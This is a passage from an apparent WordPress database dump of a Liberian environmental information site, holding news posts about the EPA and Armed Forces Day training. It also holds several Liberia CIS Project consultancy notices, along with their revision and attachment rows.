Liberians that his government will continue to protect the country’s natural resources for the benefit of both present and future generations.</p>\n<!-- /wp:paragraph -->','President Boakai Reaffirms Commitment to Environmental Protection and Climate Action','','inherit','closed','closed','','5735-revision-v1','','','2026-01-26 20:41:03','2026-01-26 20:41:03','',5735,'https://ekmsliberia.info/?p=5737',0,'revision','',0),(5738,38,'2026-01-26 20:49:42','2026-01-26 20:49:42','<!-- wp:paragraph -->\n<p>Margibi County, Liberia — The Environmental Protection Agency (EPA) of Liberia is participating in a specialized training program for its inspectors at the Edward Binyah Kesselly (EBK) Barracks in Margibi County, ahead of the February 11, 2026 Armed Forces Day celebration.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training, led by members of the Armed Forces of Liberia (AFL), forms part of activities marking the 69th anniversary of the AFL as a formally recognized national institution. This year’s observance is particularly significant, as it marks the first time the EPA, under the leadership of its Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, has formally joined the AFL in commemorating Armed Forces Day.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to R. Baiyezenah Brown, Inspector General at the EPA, the exercise is aimed at strengthening discipline, teamwork, and operational readiness among inspectors, while deepening institutional collaboration between the Agency and the Armed Forces of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Armed Forces Day, celebrated annually on February 11, recognizes the role of the AFL in defending Liberia’s sovereignty and contributing to national peace and stability.</p>\n<!-- /wp:paragraph -->','EPA Inspectors Train at EBK Barracks Ahead of Armed Forces Day','','publish','open','open','','epa-inspectors-train-at-ebk-barracks-ahead-of-armed-forces-day','','','2026-01-26 20:49:43','2026-01-26 20:49:43','',0,'https://ekmsliberia.info/?p=5738',30,'post','',0),(5739,38,'2026-01-26 20:49:24','2026-01-26 20:49:24','','WhatsApp Image 2026-01-26 at 10.10.14','','inherit','open','closed','','whatsapp-image-2026-01-26-at-10-10-14','','','2026-01-26 20:49:24','2026-01-26 20:49:24','',5738,'https://ekmsliberia.info/wp-content/uploads/2026/01/WhatsApp-Image-2026-01-26-at-10.10.14.jpeg',0,'attachment','image/jpeg',0),(5740,38,'2026-01-26 20:49:42','2026-01-26 20:49:42','<!-- wp:paragraph -->\n<p>Margibi County, Liberia — The Environmental Protection Agency (EPA) of Liberia is participating in a specialized training program for its inspectors at the Edward Binyah Kesselly (EBK) Barracks in Margibi County, ahead of the February 11, 2026 Armed Forces Day celebration.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training, led by members of the Armed Forces of Liberia (AFL), forms part of activities marking the 69th anniversary of the AFL as a formally recognized national institution. This year’s observance is particularly significant, as it marks the first time the EPA, under the leadership of its Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, has formally joined the AFL in commemorating Armed Forces Day.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to R. Baiyezenah Brown, Inspector General at the EPA, the exercise is aimed at strengthening discipline, teamwork, and operational readiness among inspectors, while deepening institutional collaboration between the Agency and the Armed Forces of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Armed Forces Day, celebrated annually on February 11, recognizes the role of the AFL in defending Liberia’s sovereignty and contributing to national peace and stability.</p>\n<!-- /wp:paragraph -->','EPA Inspectors Train at EBK Barracks Ahead of Armed Forces Day','','inherit','closed','closed','','5738-revision-v1','','','2026-01-26 20:49:42','2026-01-26 20:49:42','',5738,'https://ekmsliberia.info/?p=5740',0,'revision','',0),(5741,38,'2026-01-26 21:39:39','2026-01-26 21:39:39','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultants is to develop and operationalize an Automated Decision Management System (ADMS) to support the Liberia Climate Information System (CIS) Project, funded under the Green Climate Fund SAP018 initiative. The ADMS will strengthen Liberia’s capacity for climate-informed, evidence-based decision-making, planning, and climate risk reduction. It will integrate diverse climate data sources such as satellite imagery, meteorological and hydrological observations, and historical climate trends into a centralized platform. Through predictive analytics and decision-support tools, the system will generate timely and localized climate information for key sectors including agriculture, water, health, and infrastructure. It will also support monitoring, evaluation, and reporting (M&amp;E) of the CIS project outcomes, ensuring compliance with GCF’s results-based framework. Ultimately, the consultancy will contributes to Liberia’s long-term climate resilience by promoting adaptive planning and institutionalizing a data- driven, technology-enabled system that improves national coordination and governance for climate services and early warning in Liberia.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n<strong>Needs Assessment</strong>\r\n<ul>\r\n 	<li>Conduct in-depth stakeholder consultation process, targeting national agencies including the EPA, LMS, LHS, and NDMA to identify critical information needs, user profiles, and decision-making workflows related to climate risk management.</li>\r\n 	<li>Conduct a comprehensive mapping of available climate data sources including satellite imagery, hydrometeorological records, and early warning inputs</li>\r\n 	<li>Assess and identify users\' specific needs while exploring various data sources available for integration.</li>\r\n 	<li>Develop detailed technical specifications for the Automated Decision Management System (ADMS) to ensure it effectively meets the identified requirements.</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/5a_reoi_international_consultants_to_develop_and_operationalize_an_automated_decision_management_system.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop and Operationalize an Automated Decision Management System for Climate Services - Liberia CIS Project','','publish','closed','closed','','eoi-liberia-consultancy-services-for-international-consultant-to-develop-and-operationalize-an-automated-decision-management-system-for-climate-services-liberia-cis-project','','','2026-02-23 10:34:48','2026-02-23 10:34:48','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5741',21,'ekms_bulletin','',0),(5742,38,'2026-01-26 21:36:28','2026-01-26 21:36:28','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultants is to develop and operationalize an Automated Decision Management System (ADMS) to support the Liberia Climate Information System (CIS) Project, funded under the Green Climate Fund SAP018 initiative. The ADMS will strengthen Liberia’s capacity for climate-informed, evidence-based decision-making, planning, and climate risk reduction. It will integrate diverse climate data sources such as satellite imagery, meteorological and hydrological observations, and historical climate trends into a centralized platform. Through predictive analytics and decision-support tools, the system will generate timely and localized climate information for key sectors including agriculture, water, health, and infrastructure. It will also support monitoring, evaluation, and reporting (M&amp;E) of the CIS project outcomes, ensuring compliance with GCF’s results-based framework. Ultimately, the consultancy will contributes to Liberia’s long-term climate resilience by promoting adaptive planning and institutionalizing a data- driven, technology-enabled system that improves national coordination and governance for climate services and early warning in Liberia.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n<strong>Needs Assessment</strong>\r\n<ul>\r\n 	<li>Conduct in-depth stakeholder consultation process, targeting national agencies including the EPA, LMS, LHS, and NDMA to identify critical information needs, user profiles, and decision-making workflows related to climate risk management.</li>\r\n 	<li>Conduct a comprehensive mapping of available climate data sources including satellite imagery, hydrometeorological records, and early warning inputs</li>\r\n 	<li>Assess and identify users\' specific needs while exploring various data sources available for integration.</li>\r\n 	<li>Develop detailed technical specifications for the Automated Decision Management System (ADMS) to ensure it effectively meets the identified requirements.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop and Operationalize an Automated Decision Management System for Climate Services - Liberia CIS Project','','inherit','closed','closed','','5741-revision-v1','','','2026-01-26 21:36:28','2026-01-26 21:36:28','',5741,'https://ekmsliberia.info/?p=5742',0,'revision','',0),(5743,38,'2026-01-26 21:38:25','2026-01-26 21:38:25','','5a_reoi_international_consultants_to_develop_and_operationalize_an_automated_decision_management_system','','inherit','open','closed','','5a_reoi_international_consultants_to_develop_and_operationalize_an_automated_decision_management_system','','','2026-01-26 21:38:25','2026-01-26 21:38:25','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/5a_reoi_international_consultants_to_develop_and_operationalize_an_automated_decision_management_system.pdf',0,'attachment','application/pdf',0),(5744,38,'2026-01-26 21:39:39','2026-01-26 21:39:39','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultants is to develop and operationalize an Automated Decision Management System (ADMS) to support the Liberia Climate Information System (CIS) Project, funded under the Green Climate Fund SAP018 initiative. The ADMS will strengthen Liberia’s capacity for climate-informed, evidence-based decision-making, planning, and climate risk reduction. It will integrate diverse climate data sources such as satellite imagery, meteorological and hydrological observations, and historical climate trends into a centralized platform. Through predictive analytics and decision-support tools, the system will generate timely and localized climate information for key sectors including agriculture, water, health, and infrastructure. It will also support monitoring, evaluation, and reporting (M&amp;E) of the CIS project outcomes, ensuring compliance with GCF’s results-based framework. Ultimately, the consultancy will contributes to Liberia’s long-term climate resilience by promoting adaptive planning and institutionalizing a data- driven, technology-enabled system that improves national coordination and governance for climate services and early warning in Liberia.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n<strong>Needs Assessment</strong>\r\n<ul>\r\n 	<li>Conduct in-depth stakeholder consultation process, targeting national agencies including the EPA, LMS, LHS, and NDMA to identify critical information needs, user profiles, and decision-making workflows related to climate risk management.</li>\r\n 	<li>Conduct a comprehensive mapping of available climate data sources including satellite imagery, hydrometeorological records, and early warning inputs</li>\r\n 	<li>Assess and identify users\' specific needs while exploring various data sources available for integration.</li>\r\n 	<li>Develop detailed technical specifications for the Automated Decision Management System (ADMS) to ensure it effectively meets the identified requirements.</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/5a_reoi_international_consultants_to_develop_and_operationalize_an_automated_decision_management_system.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop and Operationalize an Automated Decision Management System for Climate Services - Liberia CIS Project','','inherit','closed','closed','','5741-revision-v1','','','2026-01-26 21:39:39','2026-01-26 21:39:39','',5741,'https://ekmsliberia.info/?p=5744',0,'revision','',0),(5745,38,'2026-01-27 08:28:29','2026-01-27 08:28:29','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide.\r\n\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultant is to develop a Policy Study to Transform the Liberia Meteorological and Hydrological Services (LMHS) into a Single Entity. By achieving this objective, it will provide a strategic framework that supports institutional reform in line with the objectives of the Liberia Climate Information Services (CIS) Project. The consultancy will aim to assess the current fragmented structure of Liberia’s meteorological and hydrological services that are currently managed by separate agencies and propose a coherent policy pathway for unifying them under a centralized, efficient, and autonomous body as well as improving coordination, reducing redundancy, and enhancing the quality, accessibility, and reliability of climate services across the country.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/4a_reoi_international_consultant_to_develop_a_policy_study_for_transforming_the_liberia_meteorological_and_hydrological_services_lmhs.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop a Policy Study to Transform LMHS into a Single Entity - Liberia CIS Project','','publish','closed','closed','','eoi-liberia-consultancy-services-for-international-consultant-to-develop-a-policy-study-to-transform-lmhs-into-a-single-entity-liberia-cis-project','','','2026-02-23 10:29:36','2026-02-23 10:29:36','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5745',20,'ekms_bulletin','',0),(5746,38,'2026-01-27 08:25:42','2026-01-27 08:25:42','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide.\r\n\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultant is to develop a Policy Study to Transform the Liberia Meteorological and Hydrological Services (LMHS) into a Single Entity. By achieving this objective, it will provide a strategic framework that supports institutional reform in line with the objectives of the Liberia Climate Information Services (CIS) Project. The consultancy will aim to assess the current fragmented structure of Liberia’s meteorological and hydrological services that are currently managed by separate agencies and propose a coherent policy pathway for unifying them under a centralized, efficient, and autonomous body as well as improving coordination, reducing redundancy, and enhancing the quality, accessibility, and reliability of climate services across the country.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop a Policy Study to Transform LMHS into a Single Entity - Liberia CIS Project','','inherit','closed','closed','','5745-revision-v1','','','2026-01-27 08:25:42','2026-01-27 08:25:42','',5745,'https://ekmsliberia.info/?p=5746',0,'revision','',0),(5747,38,'2026-01-27 08:27:32','2026-01-27 08:27:32','','4a_reoi_international_consultant_to_develop_a_policy_study_for_transforming_the_liberia_meteorological_and_hydrological_services_lmhs','','inherit','open','closed','','4a_reoi_international_consultant_to_develop_a_policy_study_for_transforming_the_liberia_meteorological_and_hydrological_services_lmhs','','','2026-01-27 08:27:32','2026-01-27 08:27:32','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/4a_reoi_international_consultant_to_develop_a_policy_study_for_transforming_the_liberia_meteorological_and_hydrological_services_lmhs.pdf',0,'attachment','application/pdf',0),(5748,38,'2026-01-27 08:28:29','2026-01-27 08:28:29','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide.\r\n\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultant is to develop a Policy Study to Transform the Liberia Meteorological and Hydrological Services (LMHS) into a Single Entity. By achieving this objective, it will provide a strategic framework that supports institutional reform in line with the objectives of the Liberia Climate Information Services (CIS) Project. The consultancy will aim to assess the current fragmented structure of Liberia’s meteorological and hydrological services that are currently managed by separate agencies and propose a coherent policy pathway for unifying them under a centralized, efficient, and autonomous body as well as improving coordination, reducing redundancy, and enhancing the quality, accessibility, and reliability of climate services across the country.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/4a_reoi_international_consultant_to_develop_a_policy_study_for_transforming_the_liberia_meteorological_and_hydrological_services_lmhs.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop a Policy Study to Transform LMHS into a Single Entity - Liberia CIS Project','','inherit','closed','closed','','5745-revision-v1','','','2026-01-27 08:28:29','2026-01-27 08:28:29','',5745,'https://ekmsliberia.info/?p=5748',0,'revision','',0),(5749,38,'2026-01-27 08:33:52','2026-01-27 08:33:52','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide. The objective of the project is to strengthen Liberia’s climate-related observation and monitoring capabilities, early warning and early action systems, and other environment-related information systems. The objective seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response by integrating green growth, environmental resilience, and adaptation into national development planning through effective climate information systems in Liberia.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of this consultancy is to deliver a secure, user-friendly, and fully functional portal that enables users to access meteorological and hydrological data in real time and retrospectively. The portal should support climate modeling, forecasting operations, and early warning system functionalities. In addition, it must enhance the accessibility of climate data for policymakers and stakeholders, allowing them to make informed decisions. Lastly, the portal is expected to be scalable, interoperable with related systems, and compliant with global data and information-sharing standards. This endeavor aims to establish a basis for targeted interventions and to support the monitoring, evaluation, and reporting of project activities and outputs under the Green Climate Fund Simplified Approval Process (SAP) Project (SAP018 \"Enhancing Climate Information Systems for Resilient Development in Liberia (Liberia CIS)\").\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/3a_reoi_international_consultant_to_develop_the_portal_for_the_liberia_meteorological_and_hydrological_services_lmhs.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop Liberia Meteorological and Hydrological Services (LMHS) Information Portal - Liberia CIS Project','','publish','closed','closed','','eoi-liberia-consultancy-services-for-international-consultant-to-develop-liberia-meteorological-and-hydrological-services-lmhs-information-portal-liberia-cis-project','','','2026-02-23 10:27:01','2026-02-23 10:27:01','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5749',19,'ekms_bulletin','',0),(5750,38,'2026-01-27 08:32:46','2026-01-27 08:32:46','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide. The objective of the project is to strengthen Liberia’s climate-related observation and monitoring capabilities, early warning and early action systems, and other environment-related information systems. The objective seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response by integrating green growth, environmental resilience, and adaptation into national development planning through effective climate information systems in Liberia.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of this consultancy is to deliver a secure, user-friendly, and fully functional portal that enables users to access meteorological and hydrological data in real time and retrospectively. The portal should support climate modeling, forecasting operations, and early warning system functionalities. In addition, it must enhance the accessibility of climate data for policymakers and stakeholders, allowing them to make informed decisions. Lastly, the portal is expected to be scalable, interoperable with related systems, and compliant with global data and information-sharing standards. This endeavor aims to establish a basis for targeted interventions and to support the monitoring, evaluation, and reporting of project activities and outputs under the Green Climate Fund Simplified Approval Process (SAP) Project (SAP018 \"Enhancing Climate Information Systems for Resilient Development in Liberia (Liberia CIS)\").\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\nClick to:\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop Liberia Meteorological and Hydrological Services (LMHS) Information Portal - Liberia CIS Project','','inherit','closed','closed','','5749-revision-v1','','','2026-01-27 08:32:46','2026-01-27 08:32:46','',5749,'https://ekmsliberia.info/?p=5750',0,'revision','',0),(5751,38,'2026-01-27 08:33:07','2026-01-27 08:33:07','','3a_reoi_international_consultant_to_develop_the_portal_for_the_liberia_meteorological_and_hydrological_services_lmhs','','inherit','open','closed','','3a_reoi_international_consultant_to_develop_the_portal_for_the_liberia_meteorological_and_hydrological_services_lmhs','','','2026-01-27 08:33:07','2026-01-27 